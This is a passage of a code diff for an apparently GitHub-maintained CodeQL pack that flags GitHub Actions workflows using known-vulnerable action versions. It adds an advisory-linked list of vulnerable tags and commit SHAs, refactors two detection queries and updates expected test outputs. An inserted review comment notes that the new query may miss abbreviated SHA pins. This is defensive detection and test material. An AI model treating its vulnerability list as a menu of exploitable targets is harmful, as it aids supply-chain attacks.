"e4699e49fcf890a3172a02c56ba78d867dbb9fd5", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.0.0", "6a873bec5ac11c6d2a11756b8763356da63a8939", "4.4.1"] + - ["rlespinasse/github-slug-action", "2.2.0", "9d2c65418d6ecbbd3c08e686997b30482e9f4a80", "4.4.1"] + - ["rlespinasse/github-slug-action", "2.1.1", "72cfc4cb1f36c102c48541cb59511a6267e89c95", "4.4.1"] + - ["rlespinasse/github-slug-action", "2.1.0", "1172ed1802078eb665a55c252fc180138b907c51", "4.4.1"] + - ["rlespinasse/github-slug-action", "2.0.0", "ca9a67fa1f1126b377a9d80dc1ea354284c71d21", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.2.0", "fbf6d7b9c7af4e8d06135dbc7d774e717d788731", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.1.1", "242e04c2d28ac5db296e5d8203dfd7dc6bcc17a9", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.1.0", "881085bcae8c3443a89cc9401f3e1c60fb014ed2", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.0.2", "a35a1a486a260cfd99c5b6f8c6034a2929ba9b3f", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.0.1", "e46186066296e23235242d0877e2b4fe54003d54", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.0.0", "9671420482a6e4c59c06f2d2d9e0605e941b1287", "4.4.1"] + + # Azure/setup-kubectl + # https://github.com/advisories/GHSA-p756-rfxh-x63h + # CVE-2023-23939 + - ["Azure/setup-kubectl", "v2.1", "6025c840858f1afa584a5190a4426c338f59e503", "3"] + - ["Azure/setup-kubectl", "v2.0", "7ad2aa66bb42774adf65a0c580fbc96b2dadd747", "3"] + - ["Azure/setup-kubectl", "v1", "a625ca209b0faaa8871dac8fb5f50ee4b4d22622", "3"] + + # gajira-create + # https://github.com/advisories/GHSA-4xqx-pqpj-9fqw + # CVE-2020-14188 + - ["atlassian/gajira-create", "v2.0.0", "77d13eab156b8ad1c08c0655011b8a442c502998", "2.0.1"] + - ["atlassian/gajira-create", "v1.0.3", "14c3d657c383981ee595d9750f68d7e4e77d64d0", "2.0.1"] + - ["atlassian/gajira-create", "v1.0.1", "2cd32e0738e2b31717e7119717fed83e482d2a36", "2.0.1"] + - ["atlassian/gajira-create", "v1.0.0", "f11e88bf4a1358e741ac282bc198a4f21cb719a1", "2.0.1"] + + # 
hashicorp/vault-action + # https://github.com/advisories/GHSA-4mgv-m5cm-f9h7 + # CVE-2021-32074 + - ["hashicorp/vault-action", "v2.1.2", "5e5c06a3c8e96b7c4757fe7a10e03469cdbd07bb", "2.2.0"] + - ["hashicorp/vault-action", "v2.1.1", "2fb78ab91e55be5479aacf74f7b451eab79773a4", "2.2.0"] + - ["hashicorp/vault-action", "v2.1.0", "2ca76a4465bca4f71fc88320e67551a287f7eaec", "2.2.0"] + - ["hashicorp/vault-action", "v2.0.1", "952d5d48e4448ad364651cc473aeccc25bd169d9", "2.2.0"] + - ["hashicorp/vault-action", "v2.0.0", "e27b45646f82a319c8157e545e24b7588510a397", "2.2.0"] + - ["hashicorp/vault-action", "v1.0.1", "22e3f3e09e3baba4d6cc62823175d21fafe4e30a", "2.2.0"] + - ["hashicorp/vault-action", "v1.0.0", "727494f451d57cbfc932a1d8bce1b0a027d99a8b", "2.2.0"] + - ["hashicorp/vault-action", "v0.10.2", "9878eba70ad6c6e21a01bd1e2debd3f3b7cbc46e", "2.2.0"] + - ["hashicorp/vault-action", "v0.10.1", "567ec72c33597ee9feca8bed4611a8ace38330c2", "2.2.0"] + - ["hashicorp/vault-action", "v0.10.0", "5c464962be8937589f883cf209d21b3982c92360", "2.2.0"] + - ["hashicorp/vault-action", "v0.9.0", "50ece41861b565239528923369690fc43cc0050b", "2.2.0"] + - ["hashicorp/vault-action", "v0.8.0", "4ab6f6070f5be6702101c9736961beb8105e8708", "2.2.0"] + - ["hashicorp/vault-action", "v0.7.0", "4edbc9a77a84bd34b0da2e8b8d527871b6103aae", "2.2.0"] + - ["hashicorp/vault-action", "v0.6.2", "7d1d7d26adb265e6ebc6018ce2b92be7c5a7c63c", "2.2.0"] + - ["hashicorp/vault-action", "v0.6.1", "f9753d75ef0cdafe621cda2323b5dcc4d673d01a", "2.2.0"] + - ["hashicorp/vault-action", "v0.6.0", "0188d9d223dac8b24b94b04d3253bf0fe0365ca7", "2.2.0"] + - ["hashicorp/vault-action", "v0.5.0", "f229481670b4719a05f01e8fd8478c191a373c43", "2.2.0"] + - ["hashicorp/vault-action", "v0.4.0", "3b9239de79207bf3fba80a16916f257918ab1d15", "2.2.0"] + - ["hashicorp/vault-action", "v0.3.1", "ab4dc55b2ecc6eb5926c5caffa45eaf0c3ad735a", "2.2.0"] + - ["hashicorp/vault-action", "v0.3.0", "3747195c5f2848179bf615690b3e66e69a5e4dc7", "2.2.0"] + - 
["hashicorp/vault-action", "v0.2.2", "da9a93f3f5bec24febf304139a6cbe61f0f8ad5e", "2.2.0"] + - ["hashicorp/vault-action", "v0.2.1", "6784ab38963b266384880094ff02eb13334802f4", "2.2.0"] + - ["hashicorp/vault-action", "v0.2.0", "6784ab38963b266384880094ff02eb13334802f4", "2.2.0"] + - ["hashicorp/vault-action", "v0.1.0", "19c0b21a1ddb75543178ac4a250b5b7cff7fd55a", "2.2.0"] + + # check-spelling/check-spelling + # https://github.com/advisories/GHSA-g86g-chm8-7r2p + # CVE-2021-32724 + - ["check-spelling/check-spelling", "v0.0.18", "08f08a6ff6b9ebae06cb8fe463374a8a5a37e03c", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.17-alpha", "ead83f4596b4aac06f698b501b5beb3218f6214d", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.16-alpha", "5f7f35b25e6bce7b1e5a8f226369a86ab19a623e", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.15-alpha", "d8f2d9ec30e38ffae03410088062714ac04c36cd", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.14-alpha", "67ea89eaff703694453dbfd346c4c31dfab646fc", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.13-alpha", "a9db57b850b66cb664373f19f6628c4ee39fbcb5", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.12-alpha", "22b3d11338aea9482eda87725ab15b8862de4061", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.11-alpha", "10d8401e72f7b4752a765b61ecbd1539394d6f4e", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.10-alpha", "c79ba85e2b8e45ef0a8da9eb0d16e7f2135ad2c6", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.9-alpha", "13d6bbcc0a082113d1c2d33ea41fcbe915e62de9", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.8-alpha", "6505ab5f1ebbe080fc072ea3cf68bac289f419ac", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.7-alpha", "a27e3104c5c8d69c2986d22c938e679ec0f1b2c7", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.6-alpha", "8a7dfc447cd58195531f7c313f6ff693f0e2eb89", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.5-alpha", "e584b835f290270af78538013634f348d6cc7398", "0.0.19"] + - 
["check-spelling/check-spelling", "0.0.4-alpha", "cb465b08587798aa788dfd9bc345c2c982ac9e29", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.3-alpha", "b8e280ae90b28f1aadc50f93073aa6450afe820d", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.2-alpha", "8e32de8a016bc4dce4170ec36881cbb315f94ff4", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.1-alpha", "d2d0ee06c72600982d2f80bca187ce90fee6ad94", "0.0.19"] diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 93f6688d2b4..856fbaebb19 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.27 +version: 0.1.28 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql index 16404edc500..c0a81b66a48 100644 --- a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql 
@@ -12,37 +12,8 @@ */ import actions +import codeql.actions.security.UseOfKnownVulnerableActionQuery -abstract class KnownVulnerableAction extends UsesStep { - abstract string getFixedVersion(); -} - -class ActionsDownloadArtifact extends KnownVulnerableAction { - ActionsDownloadArtifact() { - this.getCallee() = "actions/download-artifact" and - ( - this.getVersion() = - [ - "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1", - "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6", - "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0", - ] - or - this.getVersion() - .matches([ - "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4", - "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e", - "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c", - "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591", - "18f0f591", "18f0f591", - ] + "%") - ) - } - - override string getFixedVersion() { result = "4.1.7" } -} - -// gh api /repos/actions/download-artifact/tags --jq 'map({name: .name, sha: .commit.sha})' --paginate from KnownVulnerableAction step select step, "The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@", step, diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql index bf7623ef260..a50c47a9793 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql 
@@ -14,28 +14,15 @@ import actions import codeql.actions.security.PoisonableSteps +import codeql.actions.security.UseOfKnownVulnerableActionQuery -from UsesStep download +from UsesStep download, KnownVulnerableAction vulnerable_action where - download.getCallee() = "actions/download-artifact" and + vulnerable_action.getVulnerableAction() = download.getCallee() and download.getCallee() = "actions/download-artifact" and ( - download.getVersion() = - [ - "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1", - "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6", - "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0", - ] - or - download - .getVersion() - .matches([ - "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4", - "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e", - "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c", - "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591", - "18f0f591", "18f0f591", - ] + "%") + download.getVersion() = vulnerable_action.getVulnerableVersion() or + download.getVersion() = vulnerable_action.getVulnerableSha() ) and ( // exists a poisonable upload artifact in the same workflow diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6ceb57f0946..73dff5a1dc8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.27 +version: 0.1.28 groups: [actions, queries] suites: codeql-suites extractor: javascript diff --git a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected index 4749fc35817..a89ef0bfbe5 100644 --- a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected 
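Review bot: The commit-pin branch of the `where` clause changes from prefix matching to exact equality: the removed code compared `download.getVersion()` against eight-character prefixes with `.matches(... + "%")`, while the new line `download.getVersion() = vulnerable_action.getVulnerableSha()` matches only when the ref equals the stored value exactly. The data rows visible elsewhere in this patch carry full 40-character SHAs, so a step pinned to an abbreviated hash of a vulnerable commit would presumably no longer be reported; if that is intended, a comment such as `// SHA pins must be full-length to match the data model` would record it, otherwise keep a prefix comparison. Separately, `vulnerable_action` is tied to `download` only through the callee name and the version strings; if `KnownVulnerableAction` is still a `UsesStep` (its definition is outside this hunk), `download instanceof KnownVulnerableAction` would express the same check more directly. The `where` clause continues past the end of the hunk.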
+++ b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected 
@@ -1,9 +1,9 @@ -| .github/workflows/test1.yml:10:9:11:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 1 | .github/workflows/test1.yml:10:9:11:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:11:9:12:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 1.0.0 | .github/workflows/test1.yml:11:9:12:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:12:9:13:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 2 | .github/workflows/test1.yml:12:9:13:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:13:9:14:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 2.1.0 | .github/workflows/test1.yml:13:9:14:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:14:9:15:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 3 | .github/workflows/test1.yml:14:9:15:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:15:9:16:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. 
Update it to $@ | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 3.0.2 | .github/workflows/test1.yml:15:9:16:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:16:9:17:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.0 | .github/workflows/test1.yml:16:9:17:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:10:9:11:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:10:9:11:6 | Uses Step | v1 | .github/workflows/test1.yml:10:9:11:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:11:9:12:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:11:9:12:6 | Uses Step | v1.0.0 | .github/workflows/test1.yml:11:9:12:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:12:9:13:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:12:9:13:6 | Uses Step | v2 | .github/workflows/test1.yml:12:9:13:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:13:9:14:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. 
Update it to $@ | .github/workflows/test1.yml:13:9:14:6 | Uses Step | v2.1.0 | .github/workflows/test1.yml:13:9:14:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:14:9:15:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:14:9:15:6 | Uses Step | v3 | .github/workflows/test1.yml:14:9:15:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:15:9:16:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:15:9:16:6 | Uses Step | v3.0.2 | .github/workflows/test1.yml:15:9:16:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:16:9:17:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:16:9:17:6 | Uses Step | v4.1.0 | .github/workflows/test1.yml:16:9:17:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.7 | | .github/workflows/test1.yml:17:9:18:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 87c55149d96e628cc2ef7e6fc2aab372015aec85 | .github/workflows/test1.yml:17:9:18:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 4.1.7 | | .github/workflows/test1.yml:18:9:19:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. 
Update it to $@ | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 9bc31d5ccc31df68ecc42ccf4149144866c47d8a | .github/workflows/test1.yml:18:9:19:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 4.1.7 | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 70eb169860e..665e9626b24 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -1,20 +1,20 @@ -| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | -| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref '2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref '3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | -| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref '5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | -| 
.github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref '2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | -| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref '2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | -| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref '2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 
'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Unpinned 3rd party Action 'artifactpoisoning71.yml' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | +| .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | +| .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | +| .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:12:9:16:6 | Uses Step: comment-branch | Uses Step: comment-branch | +| .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'xt0rted/pull-request-comment-branch' with ref 'v2', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:25:9:30:6 | Uses Step: comment-branch | Uses Step: comment-branch | | 
.github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Unpinned 3rd party Action 'PR head from 3rd party action' step $@ uses 'eficode/resolve-pr-refs' with ref 'main', not a pinned commit hash | .github/workflows/issue_comment_3rd_party_action.yml:39:9:45:6 | Uses Step: refs | Uses Step: refs | -| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | -| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | -| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref '2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | -| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | -| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | -| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 
'4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | -| .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref '1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | -| .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref '3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | -| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref '1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | +| .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | +| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | +| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | +| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | 
.github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | +| .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref 'v3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | 